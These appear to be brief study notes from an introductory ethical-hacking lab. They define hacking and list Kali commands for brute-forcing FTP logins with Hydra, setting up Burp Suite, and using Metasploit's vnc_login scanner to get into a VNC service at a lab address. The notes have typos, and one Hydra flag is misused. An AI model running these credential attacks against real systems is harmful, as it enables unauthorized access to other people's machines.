What is Hacking?
Using software or systems in ways that they were not designed to be used.
- Overt use is the designed purpose
- Covert use is other than the designed use
Hydra = Brute force for
Examples:
hydra -l user.txt -P passlist.txt 192.168.56.101 ftp
- try a list of users against the server
firefox in Kali, change network setting at bottom of preferences
Start Burp Suite, turn off interceptor under poxy
Start metasploite by typing msfconsole
search vnc_login
use auxiliary/scanner/vnc/vnc_login
set rhosts 192.168.56.101
run (or exploit)
vncviewer 192.168.56.101
the password is password